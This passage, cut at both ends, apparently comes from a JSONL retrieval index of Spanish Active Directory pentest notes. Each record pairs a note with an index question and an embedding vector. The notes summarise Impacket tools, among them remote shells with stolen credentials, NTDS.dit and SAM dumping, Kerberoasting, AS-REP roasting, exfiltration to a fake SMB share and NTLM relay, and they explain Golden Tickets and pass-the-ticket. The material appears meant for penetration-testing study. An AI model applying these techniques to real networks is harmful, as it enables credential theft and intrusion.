herramienta python sirve para ejecutar comandos remotos en Windows sin instalar el cliente?", "v": [0.17854, 0.03471, -0.14711, -0.21908, 0.11464, -0.14125, 0.0199, -0.0496, -0.065, -0.07381, -0.09093, -0.06275, 0.07656, -0.08339, 0.02724, 0.02656, 0.03924, -0.05456, 0.00703, -0.01094, 0.00997, -0.05064, -0.04435, 0.01749, -0.05056, 0.09377, 0.10703, -0.01815, -0.18764, -0.02586, 0.06944, 0.00345, 0.03597, -0.05193, -0.07975, -0.05444, -0.0733, 0.06367, -0.02909, 0.12481, 0.01284, 0.05063, -0.10247, 0.05203, 0.01191, -0.04567, 0.0982, -0.04438, 0.08385, 0.00416, -0.02874, -0.11591, -0.09269, -0.08859, 0.01882, -0.09841, 0.2656, -0.09618, 0.06985, -0.0053, -0.06401, -0.01309, 0.00989, 0.10875, 0.05929, -0.04293, -0.01579, -0.12308, -0.08874, 0.08296, -0.14902, 0.04403, 0.01612, 0.03881, 0.03035, -0.01034, -0.09495, -0.03075, 0.10321, -0.02684, 0.01259, -0.02238, -0.10027, -0.06151, -0.09092, -0.18583, 0.01926, 0.02044, 0.02688, -0.10695, 0.0582, 0.01003, -0.01048, 0.03861, 0.07433, 0.00516, 0.06712, -0.07046, 0.02636, 0.05246, 0.0135, -0.07243, -0.00411, 0.11743, -0.03375, 0.02625, 0.01006, -0.07014, -0.05092, -0.0507, 0.0463, -0.00683, -0.0217, -0.06018, -0.06204, -0.0908, -0.02476, -0.05717, -0.00801, 0.03358, -0.09763, 0.04423, -0.04284, 0.0783, -0.02926, -0.03038, -0.04475, 0.12598, -0.02785, -0.00493, -0.00185, -0.04961, 0.02163, -0.02323, -0.07426, 0.09166, 0.02102, -0.0737, -0.0217, -0.14008, 0.0301, 0.06352, 0.01901, -0.02624, 0.08465, 0.0303, 0.06257, -0.00379, -0.03491, 0.00546, 0.10001, -0.01757, -0.06672, 0.04591, -0.09021, -0.02183, -0.05559, 0.01144, -0.00665, 0.03935, 0.00488, -0.01665, 0.02138, -0.04052, 0.04515, -0.05602, -0.03481, -0.01798, 0.11252, 0.05879, -0.03971, 0.05841, 5e-05, -0.05398, 0.00019, -0.05314, 0.02162, 0.01346, 0.00057, -0.01658, -0.06927, 0.03556, -0.01972, -0.04754, 0.04323, 0.00904, -0.02748, -0.00269, -0.04192, 0.00229, -0.0341, 0.03662, -0.04821, -0.05765, 0.01283, -0.02711, -0.0333, -0.0194, -0.01394, -0.01703, -0.06469, -0.00198, 0.00188, -0.05516, 0.10932, 0.07435, -0.03658, 0.07133, 0.01132, 0.0666, 0.03288, -0.04776, 0.04985, -0.01233, -0.00629, -0.09958, 0.02111, -0.01167, 0.01086, 0.0053, -0.0211, -0.00697, 0.06657, -0.02992, -0.01046, 0.02993, 0.00901, -0.00724, 0.03982, -0.01492, -0.02028, 0.01026, -0.0086, -0.03126, 0.04734, -0.03323, 0.03539, -0.05208, -0.0445, -0.00844, -0.04349, 0.06999, -0.00603, -0.09413, -0.05454, -0.04977, -0.05278, 0.00225, -0.03021, -0.06291, -0.03155, 0.01248, 0.05895, -0.0383, -0.03016, 0.00508]} -{"tipo": "pregunta", "herramienta": "apuntes-ad-pentest", "perfil": "PENTESTERS", "fichero": "conocimiento/apuntes-ad-pentest.md", "tema": "", "fuente": null, "licencia": null, "texto": "### Impacket\n\n**Es una suite Python que corre en TU Kali**. Habla los protocolos de Windows (SMB, RPC, Kerberos) **sin necesidad de ser Windows**. Es como tener un \"Windows hablante\" en tu Kali.\n\nLos mΓ‘s ΓΊtiles:\n\n```\nimpacket-psexec β†’ te da shell en la vΓ­ctima si tienes creds (estilo PsExec)\nimpacket-wmiexec β†’ ejecutas comandos sin tocar disco\nimpacket-smbexec β†’ otra forma de ejecuciΓ³n remota\nimpacket-secretsdump β†’ vuelca todo el NTDS.dit y SAM de un DC, en remoto\nimpacket-GetUserSPNs β†’ ataque KERBEROASTING (saca TGS de cuentas de servicio)\nimpacket-GetNPUsers β†’ ataque ASREPROAST (usuarios sin pre-auth Kerberos)\nimpacket-getTGT β†’ forja/pide un TGT con cred conocida\nimpacket-getST β†’ pide un service ticket\nimpacket-smbserver β†’ monta un share SMB falso (para exfiltrar a Kali)\nimpacket-ntlmrelayx β†’ relay attacks NTLM\n```", "indexar": "con que puedo forjar un ticket Kerberos o realizar ataques de robo de credenciales en un dominio?", "v": [-0.18434, -0.10476, -0.14602, -0.07973, -0.0081, -0.04072, 0.1304, 0.21662, -0.02509, -0.05737, -0.03978, -0.11537, 0.04882, -0.15881, 0.17888, 0.04539, 0.04903, 0.0658, 0.11443, -0.02503, 0.03231, -0.00345, 0.04456, 0.04899, 0.06319, 0.00261, -0.00458, -0.00973, -0.04405, 0.10837, -0.01492, -0.06139, -0.0041, -0.02942, 0.01206, -0.03032, 0.00691, 0.20665, 0.09118, 0.12043, 0.03043, -0.00263, -0.15172, 0.02739, 0.00892, 0.01027, 0.00544, -0.04015, 0.01308, -0.14098, 0.06554, -0.08473, -0.16326, -0.06414, -0.02213, -0.06574, 0.04517, -0.1031, 0.01749, -0.07309, -0.12256, -0.05155, -0.04677, 0.04149, -0.03256, -0.15746, -0.0026, 0.01115, -0.00314, -0.0193, -0.04386, 0.02376, 0.05707, 0.12048, 0.08079, -0.02488, 0.05923, 0.00899, 0.06291, -0.03218, 0.02631, 0.00862, -0.07229, 0.03428, -0.02891, -0.10954, -0.01927, -0.09681, -0.04472, 0.06156, 0.058, 0.09587, -0.01723, -0.0859, -0.11175, -0.04408, -0.06992, -0.08394, -0.11806, -0.08714, -0.05257, 0.0092, -0.0805, 0.08157, 0.01787, 0.0991, -0.00534, 0.00877, 0.0294, -0.097, -0.04081, 0.00928, -0.0638, -0.07323, -0.03769, 0.07351, -0.04961, 0.01899, 0.11104, 0.02202, -0.05246, -0.0532, 0.06123, -0.08723, 0.01909, 0.01178, -0.03903, 0.02595, -0.03756, -0.17833, -0.00201, 0.1145, -0.01539, -0.0029, 0.00965, 0.06536, -0.01938, -0.06311, -0.02965, 0.08184, 0.03956, 0.11001, -0.04044, -0.00586, 0.01092, 0.01438, -0.03479, -0.06291, -0.03085, -0.06006, -0.01791, 0.02041, -0.00262, 0.10193, -0.00296, 0.03232, -0.02191, -0.03828, -0.00803, 0.05518, -0.01546, 0.01069, -0.05827, 0.09097, -0.0243, -0.01917, -0.01188, -0.02714, 0.04488, 0.08878, -0.05583, 0.07617, 0.04053, 0.0147, 0.03973, -0.00637, -0.00052, -0.02288, -0.02887, -0.05953, 0.01223, -0.08427, 0.01952, 0.03032, -0.02194, 0.03949, 0.07953, 0.00299, 0.01993, 0.03284, 0.06181, -0.00734, -0.02014, 0.0746, -0.00443, -0.04737, -0.01658, -0.00772, -0.05567, 0.04759, -0.05873, -0.0286, -0.02902, -0.03629, 0.04148, 0.04104, -0.00338, -0.03998, 0.00272, 0.0454, 0.03157, -0.0468, 0.07902, -0.11701, -0.07584, -0.0171, 0.02742, 0.00418, -0.06718, -0.03744, 0.05811, 0.0196, 0.00242, -0.00277, 0.02805, 0.0009, -0.0222, -0.04001, 0.05411, 0.0409, 0.00554, -0.00653, 0.00876, 0.00842, 0.0315, 0.01286, 0.05305, -0.00788, -0.06479, 0.02201, -0.05337, 0.01516, 0.0253, -0.03859, -0.07298, -0.05345, -0.09579, -0.00768, 0.01555, 0.0001, 0.01566, 0.01953, -0.00083, -0.02035, -0.00568, -0.02063]} -{"tipo": "pregunta", "herramienta": "apuntes-ad-pentest", "perfil": "PENTESTERS", "fichero": "conocimiento/apuntes-ad-pentest.md", "tema": "", "fuente": null, "licencia": null, "texto": "### Impacket\n\n**Es una suite Python que corre en TU Kali**. Habla los protocolos de Windows (SMB, RPC, Kerberos) **sin necesidad de ser Windows**. Es como tener un \"Windows hablante\" en tu Kali.\n\nLos mΓ‘s ΓΊtiles:\n\n```\nimpacket-psexec β†’ te da shell en la vΓ­ctima si tienes creds (estilo PsExec)\nimpacket-wmiexec β†’ ejecutas comandos sin tocar disco\nimpacket-smbexec β†’ otra forma de ejecuciΓ³n remota\nimpacket-secretsdump β†’ vuelca todo el NTDS.dit y SAM de un DC, en remoto\nimpacket-GetUserSPNs β†’ ataque KERBEROASTING (saca TGS de cuentas de servicio)\nimpacket-GetNPUsers β†’ ataque ASREPROAST (usuarios sin pre-auth Kerberos)\nimpacket-getTGT β†’ forja/pide un TGT con cred conocida\nimpacket-getST β†’ pide un service ticket\nimpacket-smbserver β†’ monta un share SMB falso (para exfiltrar a Kali)\nimpacket-ntlmrelayx β†’ relay attacks NTLM\n```", "indexar": "como montar una carpeta compartida falsa para exfiltrar datos desde una mΓ‘quina Windows?", "v": [0.05457, -0.01494, -0.08106, -0.12037, -0.08509, -0.06087, -0.02432, -0.00457, -0.08476, -0.09254, -0.06014, -0.08374, -0.0316, -0.00255, 0.01619, 0.01659, 0.0023, -0.0795, 0.02112, -0.06588, -0.03723, -0.06615, 0.05909, -0.12445, -0.09987, 0.07061, 0.03613, -0.06833, -0.2397, -0.00386, 0.14621, 0.05547, 0.00418, 0.03002, 0.03474, -0.00728, -0.05158, -0.0467, 0.05052, -0.05903, 0.1219, 0.18946, -0.12242, 0.07643, 0.06239, -0.02414, -0.05958, -0.04544, 0.0663, 0.06619, -0.03298, -0.06584, -0.07805, 0.03336, -0.03968, -0.20586, 0.14205, -0.09961, 0.09379, 0.10386, -0.00806, 0.06356, -0.07656, 0.15466, -0.05688, -0.00598, 0.082, -0.02892, -0.03091, 0.12949, -0.04072, 0.03283, 0.03449, -0.09494, 0.02685, -0.04324, -0.02509, -0.0428, 0.01758, 0.0251, 0.01867, -0.05206, 2e-05, 0.00785, 0.02823, -0.08444, 0.07182, -0.0352, -0.00545, -0.0862, 0.04872, 0.02191, -0.11563, 0.02568, 0.11365, -0.05609, 0.05737, -0.02215, -0.00182, 0.04592, -0.01239, -0.03228, -0.04704, 0.14616, -0.05517, 0.0861, -0.03474, -0.02221, -0.05148, -0.06048, 0.03343, 0.04707, -0.10508, 0.02741, -0.00504, -0.13143, 0.01212, -0.01934, -0.01942, 0.06693, -0.07997, -0.00129, 0.03325, 0.02442, -0.00549, -0.09918, -0.00864, 0.12642, -0.02612, 0.05431, -0.0668, 0.05613, -0.04582, -0.02056, -0.034, 0.044, -0.05594, -0.09129, 0.01219, -0.1515, 0.09114, 0.11037, -0.02844, -0.03516, -0.05224, 0.01866, 0.10837, 0.01806, -0.01565, -0.07524, 0.09632, 0.06022, 0.05247, 0.03996, -0.08066, 0.0684, 0.03782, -0.03745, -0.02444, -0.00354, -0.01467, -0.02999, -0.0472, 0.00981, 0.03201, 0.00662, -0.00213, 0.02592, 0.04307, 0.01855, -0.03437, 0.08605, 0.02593, -0.02938, 0.03177, 0.08109, 0.0342, -0.07669, -0.02282, 0.00317, -0.0269, 0.00491, 0.0445, 0.00024, -0.05647, -0.00146, -0.00972, 0.01387, -1e-05, -0.04735, 0.0278, 0.00369, 0.05806, 0.00522, 0.04228, -0.09087, -0.03929, -0.00952, 0.14433, 0.04599, -0.08314, 0.04483, -0.05146, -0.02617, 0.03349, 0.03374, -0.07379, -0.02589, 0.0223, 0.05032, 0.01075, -0.02972, -0.08758, -0.09058, -0.03466, -0.03848, 0.06654, -0.02667, -0.03149, -0.00146, -0.01527, 0.00777, 0.059, 0.0106, -0.03789, 0.00425, -0.00173, 0.0441, 0.06431, -0.01072, 0.01313, 0.04651, 0.01505, -0.01495, 0.04789, 0.03386, 0.02319, -0.04759, -0.0313, -0.06066, -0.01723, 0.04702, -0.02748, -0.11819, 0.01368, -0.01211, -0.05494, 0.04907, 0.04533, -0.09656, -0.0127, -0.07875, -0.00554, -0.03918, -0.0589, -0.02105]} -{"tipo": "pregunta", "herramienta": "apuntes-ad-pentest", "perfil": "PENTESTERS", "fichero": "conocimiento/apuntes-ad-pentest.md", "tema": "", "fuente": null, "licencia": null, "texto": "### Kerberos en 30 segundos\n\n```\n β”Œβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β” β”Œβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”\n β”‚ Usuario β”‚ ΒΏPwd? β”‚ KDC (Domain β”‚\n β”‚ (cliente)β”‚ ─────────────► β”‚ Controller) β”‚\n β””β”€β”€β”€β”€β”¬β”€β”€β”€β”€β”€β”˜ β””β”€β”€β”€β”€β”¬β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”˜\n β”‚ β”‚\n β”‚ ◄──── TGT (te identifica)β”‚\n β”‚ β”‚\n β”‚ TGT + \"quiero \\\\fileSrv\" β”‚\n β”œβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β–Ίβ”‚\n β”‚ β”‚\n β”‚ ◄──── TGS (para fileSrv)β”‚\n β”‚ β”‚\n β”‚ β”Œβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β” β”‚\n └──────────►│ fileServerβ”‚ \"este TGS prueba que soy yo\"\n β””β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”˜\n```\n\n- **TGT** = \"carnet maestro\" del KDC. Lo guarda el cliente.\n- **TGS** = \"ticket de un dΓ­a\" para hablar con un servicio concreto.\n- **Trucos**: si pillas un TGT/TGS vΓ‘lido lo puedes **reutilizar** (pass-the-ticket). Si pillas el hash de `krbtgt` (la cuenta que firma TODOS los TGT) puedes forjar **Golden Tickets** = ser cualquiera, para siempre.\n\n---", "indexar": "con quΓ© herramienta puedo generar un Golden Ticket?", "v": [-0.12707, 0.01178, -0.02511, -0.08641, -0.05443, 0.04086, -0.0931, 0.04128, 0.01447, -0.10582, -0.0743, 0.07122, -0.0715, 0.0513, 0.06953, 0.112, 0.07017, -0.14701, 0.0204, 0.05713, -0.00383, 0.07332, 0.02082, -0.26216, 0.0213, -0.08802, 0.12142, -0.01452, -0.09167, 0.09601, 0.08835, -0.10677, -0.07758, -0.17397, -0.14159, -0.10733, -0.00851, 0.17222, 0.02082, -0.04968, -0.0172, 0.05381, -0.00559, 0.05339, 0.10518, -0.05187, 0.02309, 0.0882, -0.11854, 0.02329, -0.02373, -0.12854, -0.08634, -0.0521, 0.04344, -0.09927, 0.10309, -0.15244, -0.03935, -0.02105, -0.09444, -0.07282, -0.07309, 0.01033, -0.12839, 0.11821, 0.02606, -0.0116, -0.00356, 0.05026, -0.06249, 0.02592, 0.04915, 0.06173, 0.08755, -0.01312, 0.0538, 0.03389, -0.01334, 0.07121, 0.06715, 0.01949, -0.00334, 0.02653, 0.03812, -0.07563, 0.09564, -0.08597, -0.04924, -0.0778, -0.07667, -0.01016, 0.05837, 0.00624, -0.02276, -0.06869, -0.01674, -0.10289, -0.1015, 0.04213, 0.09888, -0.07029, -0.06746, 0.05014, -0.02035, 0.0419, -0.01794, -0.034, -0.09376, -0.00568, -0.04724, 0.04643, -0.0598, 0.00335, -0.01048, 0.08955, 0.03774, -0.02398, 0.06066, -0.05161, 0.1169, 0.03222, -0.09544, -0.0556, 0.01519, 0.03351, -0.03263, 0.04835, 0.01312, -0.07037, -0.05093, 0.02013, -0.02126, -0.00685, 0.00503, -0.01443, -0.00559, -0.1432, 0.07082, 0.01324, 0.0186, -0.02851, 0.01397, -0.09518, 0.01258, -0.07999, -0.03043, -0.03992, -0.04674, -0.03248, 0.01771, -0.1033, -0.02759, 0.09417, -0.08911, 0.04669, -0.03245, 0.00906, -0.08745, 0.01177, -0.06394, -0.00452, -0.02133, 0.02518, 0.01247, 0.01645, -0.01778, 0.03733, -0.01172, 0.06059, 0.04246, -0.00088, 0.09458, -0.01811, -0.02307, -0.1015, -0.08563, -0.03711, 0.03212, -0.10563, 0.05754, -0.00252, -0.05255, 0.00283, -0.03199, -0.01773, 0.02561, -0.03295, 0.05716, 0.06707, -0.02938, 0.03645, 0.05539, -0.02323, 0.02784, -0.06498, 0.00836, -0.06512, 0.03815, -0.03907, -0.03433, -0.00963, -0.01534, 0.00487, 0.09571, 0.0428, -0.04148, -0.00014, -0.01987, 0.07235, 0.03096, -0.01963, 0.08978, -0.04666, 0.00515, -0.00543, -0.01631, 0.00783, -0.04109, -0.00536, 0.10654, 0.01545, 0.06244, -0.01919, -0.00915, 0.01892, 0.01304, 0.02743, 0.04949, 0.03721, 0.06353, -0.02682, -0.02892, 0.04206, 0.06416, -0.0223, 0.05564, -0.04883, -0.08119, 0.03688, 0.00259, 0.06316, 0.00155, 0.02008, 0.0048, -0.01341, 0.0092, 0.0221, 0.01508, -0.06409, -0.02975, 0.01436, 0.037, -0.07078, 0.00661, -0.02281]} -{"tipo": "pregunta", "herramienta": "apuntes-ad-pentest", "perfil": "PENTESTERS", "fichero": "conocimiento/apuntes-ad-pentest.md", "tema": "", "fuente": null, "licencia": null, "texto": "### Kerberos en 30 segundos\n\n```\n β”Œβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β” β”Œβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”\n β”‚ Usuario β”‚ ΒΏPwd? β”‚ KDC (Domain β”‚\n β”‚ (cliente)β”‚ ─────────────► β”‚ Controller) β”‚\n β””β”€β”€β”€β”€β”¬β”€β”€β”€β”€β”€β”˜ β””β”€β”€β”€β”€β”¬β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”˜\n β”‚ β”‚\n β”‚ ◄──── TGT (te identifica)β”‚\n β”‚ β”‚\n β”‚ TGT + \"quiero \\\\fileSrv\" β”‚\n β”œβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β–Ίβ”‚\n β”‚ β”‚\n β”‚ ◄──── TGS (para fileSrv)β”‚\n β”‚ β”‚\n β”‚ β”Œβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β” β”‚\n └──────────►│ fileServerβ”‚ \"este TGS prueba que soy yo\"\n β””β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”˜\n```\n\n- **TGT** = \"carnet maestro\" del KDC. Lo guarda el cliente.\n- **TGS** = \"ticket de un dΓ­a\" para hablar con un servicio concreto.\n- **Trucos**: si pillas un TGT/TGS vΓ‘lido lo puedes **reutilizar** (pass-the-ticket). Si pillas el hash de `krbtgt` (la cuenta que firma TODOS los TGT) puedes forjar **Golden Tickets** = ser cualquiera, para siempre.\n\n---", "indexar": "que programa me sirve para hacer pass-the-ticket?", "v": [-0.07171, 0.05749, -0.22596, -0.15186, 0.03646, -0.11647, 0.00684, 0.00636, 0.01086, 0.01529, -0.03742, -0.04103, 0.06948, -0.05277, 0.02667, 0.00012, 0.09107, 0.01501, 0.23647, 0.03791, 0.0155, 0.07295, 0.03121, -0.08466, -0.01471, 0.08873, 0.07136, -0.0265, -0.14526, -0.03549, 0.02128, -0.04321, 0.00382, -0.15857, 0.09646, -0.01039, 0.10418, 0.08279, 0.04262, 0.00435, 0.02083, 0.03137, -0.0042, 0.1299, 0.01521, -0.1298, 0.09175, 0.08753, -0.01753, -0.06162, 0.03133, -0.04906, -0.00178, 0.08852, 0.02945, -0.08891, -0.08467, -0.11692, -0.12025, 0.04552, -0.02657, -0.08221, 0.03773, 0.02799, 0.00496, 0.05782, 0.12996, -0.06069, 0.00212, -0.0384, -0.12157, 0.02197, 0.11579, 0.01975, -0.06706, 0.01379, 0.05511, -0.05368, 0.08413, -0.01346, 0.02568, 0.03589, -0.01716, -0.00818, 0.05318, -0.00177, 0.08211, -0.01117, 0.02309, 0.07945, 0.0251, 0.12335, 0.11581, 0.02987, 0.06016, -0.10556, 0.04507, -0.01868, -0.01571, 0.00642, 0.02147, -0.08194, -0.09843, 0.04506, -0.08077, 0.07477, 0.1115, 0.01215, -0.06012, 0.14309, 0.02186, 0.03627, -0.0937, -0.03189, -0.05543, 0.03565, 0.02809, 0.00773, 0.0613, 0.06031, -0.03445, 0.07183, -0.02568, -0.12052, 0.0865, 0.01446, -0.04049, 0.16438, 0.00998, 0.08658, 0.01585, 0.07998, -0.06506, 0.02131, -0.09028, -0.1072, 0.04488, -0.03726, 0.02283, 0.04335, 0.05758, 0.08445, 0.01539, 0.09538, 0.02678, -0.01252, 0.0227, -0.05808, -0.02433, 0.01833, -0.00323, -0.018, -9e-05, 0.13458, -0.00918, -0.02378, 0.07364, -0.04155, -0.09513, 0.06869, -0.07331, 0.01373, -0.03012, 0.00878, 0.07483, -0.01664, -0.02709, -0.01139, 0.06031, 0.06568, -0.01317, 0.01691, 0.10959, -0.02876, 0.03286, -0.03639, -0.01033, -0.04485, 0.05446, -0.04672, 0.00318, -0.02436, 0.09694, 0.02289, -0.02734, -0.04207, -0.00586, -0.01799, 0.04031, 0.03112, -0.01185, 0.00206, -0.0098, 0.02333, -0.08977, 0.01643, -0.06312, -0.03823, 0.00406, -0.02989, -0.00138, 0.03057, 0.01816, -0.02277, 0.07466, 0.0832, -0.0087, -0.03293, 0.09217, 0.13786, 0.03278, -0.02769, 0.07037, -0.00931, -0.0385, -0.05754, 0.01458, 0.03915, 0.02616, 0.01051, 0.05134, -0.02289, -0.02194, 0.07259, 0.02807, -0.08017, 0.04139, -0.02723, 0.0394, 0.00973, 0.02386, -0.05422, 0.04319, -0.00637, 0.02705, -0.03264, -0.06134, -0.04129, -0.0936, -0.07674, 0.01279, 0.05238, 0.01886, -0.02449, -0.03623, 0.04758, -0.03296, -0.03192, 0.02789, 0.0283, -0.0539, -0.02074, 0.01839, 0.01281, 0.04585, 0.00347]} -{"tipo": "pregunta", "herramienta": "apuntes-ad-pentest", "perfil": "PENTESTERS", "fichero": "conocimiento/apuntes-ad-pentest.md", "tema": "", "fuente": null, "licencia": null, "texto": "### Kerberos en 30 segundos\n\n```\n β”Œβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β” β”Œβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”\n β”‚ Usuario β”‚ ΒΏPwd? β”‚ KDC (Domain β”‚\n β”‚ (cliente)β”‚ ─────────────► β”‚ Controller) β”‚\n β””β”€β”€β”€β”€β”¬β”€β”€β”€β”€β”€β”˜ β””β”€β”€β”€β”€β”¬β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”˜\n β”‚ β”‚\n β”‚ ◄──── TGT (te identifica)β”‚\n β”‚ β”‚\n β”‚ TGT + \"quiero \\\\fileSrv\" β”‚\n β”œβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β–Ίβ”‚\n β”‚ β”‚\n β”‚ ◄──── TGS (para fileSrv)β”‚\n β”‚ β”‚\n β”‚ β”Œβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β” β”‚\n └──────────►│ fileServerβ”‚ \"este TGS prueba que soy yo\"\n β””β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”˜\n```\n\n- **TGT** = \"carnet maestro\" del KDC. Lo guarda el cliente.\n- **TGS** = \"ticket de un dΓ­a\" para hablar con un servicio concreto.\n- **Trucos**: si pillas un TGT/TGS vΓ‘lido lo puedes **reutilizar** (pass-the-ticket). Si pillas el hash de `krbtgt` (la cuenta que firma TODOS los TGT) puedes forjar **Golden Tickets** = ser cualquiera, para siempre.\n\n---", "indexar": "cual es una alternativa libre a Kerberos?", "v": [-0.12863, -0.05857, 0.05101, 0.13581, -0.13753, -0.13197, -0.0128, 0.09247, -0.14985, -0.16965, -0.10806, -0.15965, -0.02136, -0.02544, 0.21341, -0.0388, -0.02946, -0.06851, 0.20592, 0.0603, 0.01228, 0.07366, -0.06764, -0.07487, -0.08797, -0.08147, -0.03774, -0.04255, -0.0328, 0.04694, -0.03355, 0.00855, 0.03829, -0.03035, 0.00366, 0.06947, 0.06085, 0.15033, 0.10275, -0.02449, 0.04615, -0.04013, 0.05908, 0.13653, -0.03441, -0.04916, -0.09904, 0.04493, 0.00971, 0.03008, 0.00796, 0.00954, -0.02804, 0.01458, 0.09393, -0.05204, 0.13524, -0.11718, -0.1079, 0.01, -0.04577, 0.00251, -0.02488, -0.02903, 0.04733, -0.11337, -0.07376, 0.00029, -0.03808, 0.03813, 0.0659, 0.02133, 0.07616, -0.00402, -0.08848, 0.12633, -0.06479, -0.00468, -0.04702, 0.07259, 0.05256, -0.07822, 0.03096, 0.1082, 0.00965, -0.14867, 0.1054, -0.08162, -0.03414, 0.04533, 0.05006, 0.03947, 0.02244, 0.11784, -0.03802, -0.11248, -0.06797, 0.12707, -0.0287, 0.05525, 0.03317, 0.01658, -0.10842, -0.04837, 0.01033, -0.02254, -0.07322, 0.08267, -0.07031, -0.01772, 0.01648, 0.08028, 0.045, 0.0096, -0.02186, 0.01657, -0.05664, 0.04211, 0.0268, 0.03732, -0.03968, 0.01161, -0.04255, -0.1387, 0.00878, 0.03742, 0.09115, 0.04243, -0.07979, 0.06053, 0.09235, 0.01953, -0.03113, -0.11248, -0.11491, -0.03176, 0.02335, -0.03459, 0.01411, 0.02813, -0.00782, 0.04626, 0.00071, -0.02554, 0.02487, -0.03668, 0.01546, -0.00464, 0.03038, -0.06449, -0.09466, 0.03325, -0.03628, 0.12578, -0.02005, 0.02581, -0.06365, -0.01777, -0.04476, 0.09427, 0.03412, -0.04439, 0.02352, 0.04103, 0.0147, -0.01365, 0.01621, -0.02936, -0.08094, 0.05274, 0.00967, 0.07466, 0.07266, -0.02111, 0.03334, -0.0678, 0.04535, -0.07364, -0.0079, -0.03373, 0.05085, 0.02132, -0.0732, -0.01271, -0.00758, -0.04457, 0.03001, 0.00904, 0.01556, 0.01122, -0.00875, -0.00858, -0.08643, -0.08747, -0.02271, 0.01682, 0.0357, -0.09495, -0.00567, -0.01201, -0.09792, -0.01599, 0.00709, -0.01933, -0.01165, 0.01893, -0.02935, 0.03722, -0.00653, 0.05514, 0.05646, -0.01936, 0.09519, 0.00792, -0.05484, 0.00498, 0.03566, -0.05049, -0.01369, -0.00346, 0.05363, 0.03013, 0.03236, -0.00365, 0.00364, 0.05939, 0.03068, 0.051, -0.058, 0.00284, -0.02004, 0.00013, -0.00055, 0.0462, 0.01097, 0.01242, -0.00071, 0.0537, 0.00836, -0.0288, 0.06739, 0.05523, -0.01492, 0.00833, -0.02895, -0.00981, -0.09014, -0.03279, -0.04306, -0.02139, -0.02993, 0.03265, -0.02284, 0.01033, 0.02276, -0.00787]} -{"tipo": "pregunta", "herramienta": "apuntes-ad-pentest", "perfil": "PENTESTERS", "fichero": "conocimiento/apuntes-ad-pentest.md", "tema": "", "fuente": null, "licencia": null, "texto": "## La cadena de ataque \"OSCP tΓ­pica\" con esto", "indexar": "ΒΏQuΓ© herramientas sirven para montar una cadena de ataque desde cero?", "v": [-0.07927, 0.00473, -0.11584, -0.06734, -0.19439, -0.05697, -0.07781, 0.0358, -0.03484, -0.04553, -0.08227, -0.09424, -0.0998, -0.15893, 0.14704, 0.07315, -0.00401, -0.07787, 0.13543, -0.04044, -0.07697, 0.00798, 0.08993, -0.12996, -0.09841, 0.09121, 0.06972, -0.0232, -0.25905, 0.02556, 0.039, -0.03937, 0.14278, 0.07966, 0.06188, -0.14343, -0.01424, 0.0346, 0.07571, 0.0798, -0.05152, -0.07067, -0.10251, -0.01757, 0.025, 0.01011, 0.06519, 0.03521, 0.01525, 0.08724, 0.00169, -0.04302, -0.15836, -0.08718, -0.05367, -0.10299, 0.1223, -0.05044, 0.09785, -0.06466, -0.05935, 0.0795, -0.02311, -0.04653, -0.02656, -0.05371, -0.08039, -0.00099, -0.18048, 0.00418, -0.08278, -0.07385, -0.03277, 0.09463, -0.02268, -0.01174, 0.10315, 0.04472, 0.05877, 0.02632, 0.05181, 0.02031, -0.03186, -0.00359, -0.00919, 0.02034, 0.11136, -0.02108, -0.09144, -0.02644, 0.03313, 0.09808, -0.01802, -0.05838, -0.0199, -0.03917, 0.04432, -0.00774, 0.00836, -0.01289, -0.04211, -0.05942, -0.03789, 0.13615, 0.06582, 0.07677, -0.09416, 0.0122, -0.04283, -0.04647, -0.01927, 0.04, -0.06409, -0.02043, -0.08951, -0.03158, -0.05445, -0.01807, -0.01487, 0.00746, -0.07755, 0.16919, 0.0133, 0.06537, -0.03736, -0.00465, 0.0118, -0.00142, 0.00367, -0.00789, 0.01429, -0.0218, -0.03363, -0.08233, 0.00466, -0.03862, 0.05998, -0.11462, -0.12486, -0.01818, 0.05284, 0.03196, -0.07629, -0.04628, 0.03496, -0.02731, 0.01918, -0.1321, -0.0705, 0.07686, -0.00824, 0.07492, 0.01986, 0.02744, -0.05984, -0.05003, 0.01217, -0.01911, -0.02611, 0.0747, 0.08031, -0.06591, -0.00044, 0.01561, -0.00297, -0.05643, 0.01132, 0.03303, 0.0889, 0.0458, -0.00501, 0.09383, 0.04807, 0.01975, 0.0378, 0.01249, -0.07178, -0.01953, 0.0098, 0.00198, 0.02666, -0.04229, -0.10161, 0.059, 0.06489, -0.00527, 0.09958, 0.0088, 0.05353, 0.09197, -0.08179, -0.01885, -0.01093, -0.0219, 0.02883, -0.0425, 0.00187, 0.01466, -0.00885, 0.04551, -0.01866, -0.04711, 0.01402, 0.00363, 0.04399, 0.04305, -0.03209, -0.00704, 0.00448, 0.07637, 0.01263, -0.02644, 0.04902, -0.04483, -0.0359, -0.00094, -0.0035, 0.04284, 0.01359, 0.0195, 0.00239, 0.00454, 0.03605, 0.00125, -0.01105, -0.00858, -0.04583, 0.0005, 0.02155, -0.02847, 0.02893, -0.07405, -0.01535, 0.00721, -0.03101, -0.08216, 0.04285, -0.01208, -0.04543, 0.03882, -0.04264, 0.05099, 0.01134, 